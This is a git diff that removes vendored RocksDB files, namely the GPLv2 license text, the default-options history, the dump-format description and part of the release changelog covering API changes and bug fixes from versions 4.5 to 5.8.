diff --git a/thirdparty/rocksdb/COPYING b/thirdparty/rocksdb/COPYING
deleted file mode 100644
index d159169..0000000
--- a/thirdparty/rocksdb/COPYING
+++ /dev/null
@@ -1,339 +0,0 @@
-                    GNU GENERAL PUBLIC LICENSE
-                       Version 2, June 1991
-
- Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
- 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-                            Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-License is intended to guarantee your freedom to share and change free
-software--to make sure the software is free for all its users.  This
-General Public License applies to most of the Free Software
-Foundation's software and to any other program whose authors commit to
-using it.  (Some other Free Software Foundation software is covered by
-the GNU Lesser General Public License instead.)  You can apply it to
-your programs, too.
-
-  When we speak of free software, we are referring to freedom, not
-price.  Our General Public Licenses are designed to make sure that you
-have the freedom to distribute copies of free software (and charge for
-this service if you wish), that you receive source code or can get it
-if you want it, that you can change the software or use pieces of it
-in new free programs; and that you know you can do these things.
-
-  To protect your rights, we need to make restrictions that forbid
-anyone to deny you these rights or to ask you to surrender the rights.
-These restrictions translate to certain responsibilities for you if you
-distribute copies of the software, or if you modify it.
-
-  For example, if you distribute copies of such a program, whether
-gratis or for a fee, you must give the recipients all the rights that
-you have.  You must make sure that they, too, receive or can get the
-source code.  And you must show them these terms so they know their
-rights.
-
-  We protect your rights with two steps: (1) copyright the software, and
-(2) offer you this license which gives you legal permission to copy,
-distribute and/or modify the software.
-
-  Also, for each author's protection and ours, we want to make certain
-that everyone understands that there is no warranty for this free
-software.  If the software is modified by someone else and passed on, we
-want its recipients to know that what they have is not the original, so
-that any problems introduced by others will not reflect on the original
-authors' reputations.
-
-  Finally, any free program is threatened constantly by software
-patents.  We wish to avoid the danger that redistributors of a free
-program will individually obtain patent licenses, in effect making the
-program proprietary.  To prevent this, we have made it clear that any
-patent must be licensed for everyone's free use or not licensed at all.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.
-
-                    GNU GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License applies to any program or other work which contains
-a notice placed by the copyright holder saying it may be distributed
-under the terms of this General Public License.  The "Program", below,
-refers to any such program or work, and a "work based on the Program"
-means either the Program or any derivative work under copyright law:
-that is to say, a work containing the Program or a portion of it,
-either verbatim or with modifications and/or translated into another
-language.  (Hereinafter, translation is included without limitation in
-the term "modification".)  Each licensee is addressed as "you".
-
-Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running the Program is not restricted, and the output from the Program
-is covered only if its contents constitute a work based on the
-Program (independent of having been made by running the Program).
-Whether that is true depends on what the Program does.
-
-  1. You may copy and distribute verbatim copies of the Program's
-source code as you receive it, in any medium, provided that you
-conspicuously and appropriately publish on each copy an appropriate
-copyright notice and disclaimer of warranty; keep intact all the
-notices that refer to this License and to the absence of any warranty;
-and give any other recipients of the Program a copy of this License
-along with the Program.
-
-You may charge a fee for the physical act of transferring a copy, and
-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-                            NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License along
-    with this program; if not, write to the Free Software Foundation, Inc.,
-    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.
diff --git a/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md b/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md
deleted file mode 100644
index 26280ee..0000000
--- a/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# RocksDB default options change log
-## Unreleased
-* delayed_write_rate takes the rate given by rate_limiter if not specified.
-
-## 5.2
-* Change the default of delayed slowdown value to 16MB/s and further increase the L0 stop condition to 36 files.
-
-## 5.0 (11/17/2016)
-* Options::allow_concurrent_memtable_write and Options::enable_write_thread_adaptive_yield are now true by default
-* Options.level0_stop_writes_trigger default value changes from 24 to 32.
-
-## 4.8.0 (5/2/2016)
-* options.max_open_files changes from 5000 to -1. It improves performance, but users need to set file descriptor limit to be large enough and watch memory usage for index and bloom filters.
-* options.base_background_compactions changes from max_background_compactions to 1. When users set higher max_background_compactions but the write throughput is not high, the writes are less spiky to disks.
-* options.wal_recovery_mode changes from kTolerateCorruptedTailRecords to kPointInTimeRecovery. Avoid some false positive when file system or hardware reorder the writes for file data and metadata.
-
-## 4.7.0 (4/8/2016)
-* options.write_buffer_size changes from 4MB to 64MB.
-* options.target_file_size_base changes from 2MB to 64MB.
-* options.max_bytes_for_level_base changes from 10MB to 256MB.
-* options.soft_pending_compaction_bytes_limit changes from 0 (disabled) to 64GB.
-* options.hard_pending_compaction_bytes_limit changes from 0 (disabled) to 256GB.
-* table_cache_numshardbits changes from 4 to 6.
-* max_file_opening_threads changes from 1 to 16.
diff --git a/thirdparty/rocksdb/DUMP_FORMAT.md b/thirdparty/rocksdb/DUMP_FORMAT.md
deleted file mode 100644
index 009daba..0000000
--- a/thirdparty/rocksdb/DUMP_FORMAT.md
+++ /dev/null
@@ -1,16 +0,0 @@
-## RocksDB dump format
-
-The version 1 RocksDB dump format is fairly simple:
-
-1) The dump starts with the magic 8 byte identifier "ROCKDUMP"
-
-2) The magic is followed by an 8 byte big-endian version which is 0x00000001.
-
-3) Next are arbitrarily sized chunks of bytes prepended by 4 byte little endian number indicating how large each chunk is.
-
-4) The first chunk is special and is a json string indicating some things about the creation of this dump.  It contains the following keys:
-* database-path: The path of the database this dump was created from.
-* hostname: The hostname of the machine where the dump was created.
-* creation-time: Unix seconds since epoc when this dump was created.
-
-5) Following the info dump the slices paired into are key/value pairs.
diff --git a/thirdparty/rocksdb/HISTORY.md b/thirdparty/rocksdb/HISTORY.md
deleted file mode 100644
index 9156290..0000000
--- a/thirdparty/rocksdb/HISTORY.md
+++ /dev/null
@@ -1,586 +0,0 @@
-# Rocksdb Change Log
-## 5.8.6 (11/20/2017)
-### Bug Fixes
-* Fixed aligned_alloc issues with Windows.
-
-## 5.8.1 (10/23/2017)
-### New Features
-* Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false.
-
-## 5.8.0 (08/30/2017)
-### Public API Change
-* Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints.
-* `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr.
-* `Transaction::Get` and `Transaction::GetForUpdate` variants with `PinnableSlice` added.
-
-### New Features
-* Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators.
-* Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1.
-* Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`.
-* Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`.
-* Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB.
-* Block-based table support for disabling checksums by setting `BlockBasedTableOptions::checksum = kNoChecksum`.
-
-### Bug Fixes
-* Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`.
-* Fix incorrect dropping of deletions during intra-L0 compaction.
-* Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled.
-* Fix potentially wrong file smallest key when range deletions separated by snapshot are written together.
-
-## 5.7.0 (07/13/2017)
-### Public API Change
-* DB property "rocksdb.sstables" now prints keys in hex form.
-
-### New Features
-* Measure estimated number of reads per file. The information can be accessed through DB::GetColumnFamilyMetaData or "rocksdb.sstables" DB property.
-* RateLimiter support for throttling background reads, or throttling the sum of background reads and writes. This can give more predictable I/O usage when compaction reads more data than it writes, e.g., due to lots of deletions.
-* [Experimental] FIFO compaction with TTL support. It can be enabled by setting CompactionOptionsFIFO.ttl > 0.
-* Introduce `EventListener::OnBackgroundError()` callback. Users can implement it to be notified of errors causing the DB to enter read-only mode, and optionally override them.
-* Partitioned Index/Filters exiting the experimental mode. To enable partitioned indexes set index_type to kTwoLevelIndexSearch and to further enable partitioned filters set partition_filters to true. To configure the partition size set metadata_block_size.
-
-
-### Bug Fixes
-* Fix discarding empty compaction output files when `DeleteRange()` is used together with subcompactions.
-
-## 5.6.0 (06/06/2017)
-### Public API Change
-* Scheduling flushes and compactions in the same thread pool is no longer supported by setting `max_background_flushes=0`. Instead, users can achieve this by configuring their high-pri thread pool to have zero threads.
-* Replace `Options::max_background_flushes`, `Options::max_background_compactions`, and `Options::base_background_compactions` all with `Options::max_background_jobs`, which automatically decides how many threads to allocate towards flush/compaction.
-* options.delayed_write_rate by default take the value of options.rate_limiter rate.
-* Replace global variable `IOStatsContext iostats_context` with `IOStatsContext* get_iostats_context()`; replace global variable `PerfContext perf_context` with `PerfContext* get_perf_context()`.
-
-### New Features
-* Change ticker/histogram statistics implementations to use core-local storage. This improves aggregation speed compared to our previous thread-local approach, particularly for applications with many threads.
-* Users can pass a cache object to write buffer manager, so that they can cap memory usage for memtable and block cache using one single limit.
-* Flush will be triggered when 7/8 of the limit introduced by write_buffer_manager or db_write_buffer_size is triggered, so that the hard threshold is hard to hit.
-* Introduce WriteOptions.low_pri. If it is true, low priority writes will be throttled if the compaction is behind.
-* `DB::IngestExternalFile()` now supports ingesting files into a database containing range deletions.
-
-### Bug Fixes
-* Shouldn't ignore return value of fsync() in flush.
-
-## 5.5.0 (05/17/2017)
-### New Features
-* FIFO compaction to support Intra L0 compaction too with CompactionOptionsFIFO.allow_compaction=true.
-* DB::ResetStats() to reset internal stats.
-* Statistics::Reset() to reset user stats.
-* ldb add option --try_load_options, which will open DB with its own option file.
-* Introduce WriteBatch::PopSavePoint to pop the most recent save point explicitly.
-* Support dynamically change `max_open_files` option via SetDBOptions()
-* Added DB::CreateColumnFamilie() and DB::DropColumnFamilies() to bulk create/drop column families.
-* Add debugging function `GetAllKeyVersions` to see internal versions of a range of keys.
-* Support file ingestion with universal compaction style
-* Support file ingestion behind with option `allow_ingest_behind`
-* New option enable_pipelined_write which may improve write throughput in case writing from multiple threads and WAL enabled.
-
-### Bug Fixes
-* Fix the bug that Direct I/O uses direct reads for non-SST file
-
-## 5.4.0 (04/11/2017)
-### Public API Change
-* random_access_max_buffer_size no longer has any effect
-* Removed Env::EnableReadAhead(), Env::ShouldForwardRawRequest()
-* Support dynamically change `stats_dump_period_sec` option via SetDBOptions().
-* Added ReadOptions::max_skippable_internal_keys to set a threshold to fail a request as incomplete when too many keys are being skipped when using iterators.
-* DB::Get in place of std::string accepts PinnableSlice, which avoids the extra memcpy of value to std::string in most of cases.
-    * PinnableSlice releases the pinned resources that contain the value when it is destructed or when ::Reset() is called on it.
-    * The old API that accepts std::string, although discouraged, is still supported.
-* Replace Options::use_direct_writes with Options::use_direct_io_for_flush_and_compaction. Read Direct IO wiki for details.
-* Added CompactionEventListener and EventListener::OnFlushBegin interfaces.
-
-### New Features
-* Memtable flush can be avoided during checkpoint creation if total log file size is smaller than a threshold specified by the user.
-* Introduce level-based L0->L0 compactions to reduce file count, so write delays are incurred less often.
-* (Experimental) Partitioning filters which creates an index on the partitions. The feature can be enabled by setting partition_filters when using kFullFilter. Currently the feature also requires two-level indexing to be enabled. Number of partitions is the same as the number of partitions for indexes, which is controlled by metadata_block_size.
-
-## 5.3.0 (03/08/2017)
-### Public API Change
-* Remove disableDataSync option.
-* Remove timeout_hint_us option from WriteOptions. The option has been deprecated and has no effect since 3.13.0.
-* Remove option min_partial_merge_operands. Partial merge operands will always be merged in flush or compaction if there are more than one.
-* Remove option verify_checksums_in_compaction. Compaction will always verify checksum.
-
-### Bug Fixes
-* Fix the bug that iterator may skip keys
-
-## 5.2.0 (02/08/2017)
-### Public API Change
-* NewLRUCache() will determine number of shard bits automatically based on capacity, if the user doesn't pass one. This also impacts the default block cache when the user doesn't explict provide one.
-* Change the default of delayed slowdown value to 16MB/s and further increase the L0 stop condition to 36 files.
-* Options::use_direct_writes and Options::use_direct_reads are now ready to use.
-* (Experimental) Two-level indexing that partition the index and creates a 2nd level index on the partitions. The feature can be enabled by setting kTwoLevelIndexSearch as IndexType and configuring index_per_partition.
-
-### New Features
-* Added new overloaded function GetApproximateSizes that allows to specify if memtable stats should be computed only without computing SST files' stats approximations.
-* Added new function GetApproximateMemTableStats that approximates both number of records and size of memtables.
-* Add Direct I/O mode for SST file I/O
-
-### Bug Fixes
-* RangeSync() should work if ROCKSDB_FALLOCATE_PRESENT is not set
-* Fix wrong results in a data race case in Get()
-* Some fixes related to 2PC.
-* Fix bugs of data corruption in direct I/O
-
-## 5.1.0 (01/13/2017)
-* Support dynamically change `delete_obsolete_files_period_micros` option via SetDBOptions().
-* Added EventListener::OnExternalFileIngested which will be called when IngestExternalFile() add a file successfully.
-* BackupEngine::Open and BackupEngineReadOnly::Open now always return error statuses matching those of the backup Env.
-
-### Bug Fixes
-* Fix the bug that if 2PC is enabled, checkpoints may loss some recent transactions.
-* When file copying is needed when creating checkpoints or bulk loading files, fsync the file after the file copying.
-
-## 5.0.0 (11/17/2016)
-### Public API Change
-* Options::max_bytes_for_level_multiplier is now a double along with all getters and setters.
-* Support dynamically change `delayed_write_rate` and `max_total_wal_size` options via SetDBOptions().
-* Introduce DB::DeleteRange for optimized deletion of large ranges of contiguous keys.
-* Support dynamically change `delayed_write_rate` option via SetDBOptions().
-* Options::allow_concurrent_memtable_write and Options::enable_write_thread_adaptive_yield are now true by default.
-* Remove Tickers::SEQUENCE_NUMBER to avoid confusion if statistics object is shared among RocksDB instance. Alternatively DB::GetLatestSequenceNumber() can be used to get the same value.
-* Options.level0_stop_writes_trigger default value changes from 24 to 32.
-* New compaction filter API: CompactionFilter::FilterV2(). Allows to drop ranges of keys.
-* Removed flashcache support.
-* DB::AddFile() is deprecated and is replaced with DB::IngestExternalFile(). DB::IngestExternalFile() remove all the restrictions that existed for DB::AddFile.
-
-### New Features
-* Add avoid_flush_during_shutdown option, which speeds up DB shutdown by not flushing unpersisted data (i.e. with disableWAL = true). Unpersisted data will be lost. The options is dynamically changeable via SetDBOptions().
-* Add memtable_insert_with_hint_prefix_extractor option. The option is mean to reduce CPU usage for inserting keys into memtable, if keys can be group by prefix and insert for each prefix are sequential or almost sequential. See include/rocksdb/options.h for more details.
-* Add LuaCompactionFilter in utilities.  This allows developers to write compaction filters in Lua.  To use this feature, LUA_PATH needs to be set to the root directory of Lua.
-* No longer populate "LATEST_BACKUP" file in backup directory, which formerly contained the number of the latest backup. The latest backup can be determined by finding the highest numbered file in the "meta/" subdirectory.
-
-## 4.13.0 (10/18/2016)
-### Public API Change
-* DB::GetOptions() reflect dynamic changed options (i.e. through DB::SetOptions()) and return copy of options instead of reference.
-* Added Statistics::getAndResetTickerCount().
-
-### New Features
-* Add DB::SetDBOptions() to dynamic change base_background_compactions and max_background_compactions.
-* Added Iterator::SeekForPrev(). This new API will seek to the last key that less than or equal to the target key.
-
-## 4.12.0 (9/12/2016)
-### Public API Change
-* CancelAllBackgroundWork() flushes all memtables for databases containing writes that have bypassed the WAL (writes issued with WriteOptions::disableWAL=true) before shutting down background threads.
-* Merge options source_compaction_factor, max_grandparent_overlap_bytes and expanded_compaction_factor into max_compaction_bytes.
-* Remove ImmutableCFOptions.
-* Add a compression type ZSTD, which can work with ZSTD 0.8.0 or up. Still keep ZSTDNotFinal for compatibility reasons.
-
-### New Features
-* Introduce NewClockCache, which is based on CLOCK algorithm with better concurrent performance in some cases. It can be used to replace the default LRU-based block cache and table cache. To use it, RocksDB need to be linked with TBB lib.
-* Change ticker/histogram statistics implementations to accumulate data in thread-local storage, which improves CPU performance by reducing cache coherency costs. Callers of CreateDBStatistics do not need to change anything to use this feature.
-* Block cache mid-point insertion, where index and filter block are inserted into LRU block cache with higher priority. The feature can be enabled by setting BlockBasedTableOptions::cache_index_and_filter_blocks_with_high_priority to true and high_pri_pool_ratio > 0 when creating NewLRUCache.
-
-## 4.11.0 (8/1/2016)
-### Public API Change
-* options.memtable_prefix_bloom_huge_page_tlb_size => memtable_huge_page_size. When it is set, RocksDB will try to allocate memory from huge page for memtable too, rather than just memtable bloom filter.
-
-### New Features
-* A tool to migrate DB after options change. See include/rocksdb/utilities/option_change_migration.h.
-* Add ReadOptions.background_purge_on_iterator_cleanup. If true, we avoid file deletion when destorying iterators.
-
-## 4.10.0 (7/5/2016)
-### Public API Change
-* options.memtable_prefix_bloom_bits changes to options.memtable_prefix_bloom_bits_ratio and deprecate options.memtable_prefix_bloom_probes
-* enum type CompressionType and PerfLevel changes from char to unsigned char. Value of all PerfLevel shift by one.
-* Deprecate options.filter_deletes.
-
-### New Features
-* Add avoid_flush_during_recovery option.
-* Add a read option background_purge_on_iterator_cleanup to avoid deleting files in foreground when destroying iterators. Instead, a job is scheduled in high priority queue and would be executed in a separate background thread.
-* RepairDB support for column families. RepairDB now associates data with non-default column families using information embedded in the SST/WAL files (4.7 or later). For data written by 4.6 or earlier, RepairDB associates it with the default column family.
-* Add options.write_buffer_manager which allows users to control total memtable sizes across multiple DB instances.
-
-## 4.9.0 (6/9/2016)
-### Public API changes
-* Add bottommost_compression option, This option can be used to set a specific compression algorithm for the bottommost level (Last level containing files in the DB).
-* Introduce CompactionJobInfo::compression, This field state the compression algorithm used to generate the output files of the compaction.
-* Deprecate BlockBaseTableOptions.hash_index_allow_collision=false
-* Deprecate options builder (GetOptions()).
-
-### New Features
-* Introduce NewSimCache() in rocksdb/utilities/sim_cache.h. This function creates a block cache that is able to give simulation results (mainly hit rate) of simulating block behavior with a configurable cache size.
-
-## 4.8.0 (5/2/2016)
-### Public API Change
-* Allow preset compression dictionary for improved compression of block-based tables. This is supported for zlib, zstd, and lz4. The compression dictionary's size is configurable via CompressionOptions::max_dict_bytes.
-* Delete deprecated classes for creating backups (BackupableDB) and restoring from backups (RestoreBackupableDB). Now, BackupEngine should be used for creating backups, and BackupEngineReadOnly should be used for restorations. For more details, see https://github.com/facebook/rocksdb/wiki/How-to-backup-RocksDB%3F
-* Expose estimate of per-level compression ratio via DB property: "rocksdb.compression-ratio-at-levelN".
-* Added EventListener::OnTableFileCreationStarted. EventListener::OnTableFileCreated will be called on failure case. User can check creation status via TableFileCreationInfo::status.
-
-### New Features
-* Add ReadOptions::readahead_size. If non-zero, NewIterator will create a new table reader which performs reads of the given size.
-
-## 4.7.0 (4/8/2016)
-### Public API Change
-* rename options compaction_measure_io_stats to report_bg_io_stats and include flush too.
-* Change some default options. Now default options will optimize for server-workloads. Also enable slowdown and full stop triggers for pending compaction bytes. These changes may cause sub-optimal performance or significant increase of resource usage. To avoid these risks, users can open existing RocksDB with options extracted from RocksDB option files. See https://github.com/facebook/rocksdb/wiki/RocksDB-Options-File for how to use RocksDB option files. Or you can call Options.OldDefaults() to recover old defaults. DEFAULT_OPTIONS_HISTORY.md will track change history of default options.
-
-## 4.6.0 (3/10/2016)
-### Public API Changes
-* Change default of BlockBasedTableOptions.format_version to 2. It means default DB created by 4.6 or up cannot be opened by RocksDB version 3.9 or earlier.
-* Added strict_capacity_limit option to NewLRUCache. If the flag is set to true, insert to cache will fail if no enough capacity can be free. Signature of Cache::Insert() is updated accordingly.
-* Tickers [NUMBER_DB_NEXT, NUMBER_DB_PREV, NUMBER_DB_NEXT_FOUND, NUMBER_DB_PREV_FOUND, ITER_BYTES_READ] are not updated immediately. The are updated when the Iterator is deleted.
-* Add monotonically increasing counter (DB property "rocksdb.current-super-version-number") that increments upon any change to the LSM tree.
-
-### New Features
-* Add CompactionPri::kMinOverlappingRatio, a compaction picking mode friendly to write amplification.
-* Deprecate Iterator::IsKeyPinned() and replace it with Iterator::GetProperty() with prop_name="rocksdb.iterator.is.key.pinned"
-
-## 4.5.0 (2/5/2016)
-### Public API Changes
-* Add a new perf context level between kEnableCount and kEnableTime. Level 2 now does not include timers for mutexes.
-* Statistics of mutex operation durations will not be measured by default. If you want to have them enabled, you need to set Statistics::stats_level_ to kAll.
-* DBOptions::delete_scheduler and NewDeleteScheduler() are removed, please use DBOptions::sst_file_manager and NewSstFileManager() instead
-
-### New Features
-* ldb tool now supports operations to non-default column families.
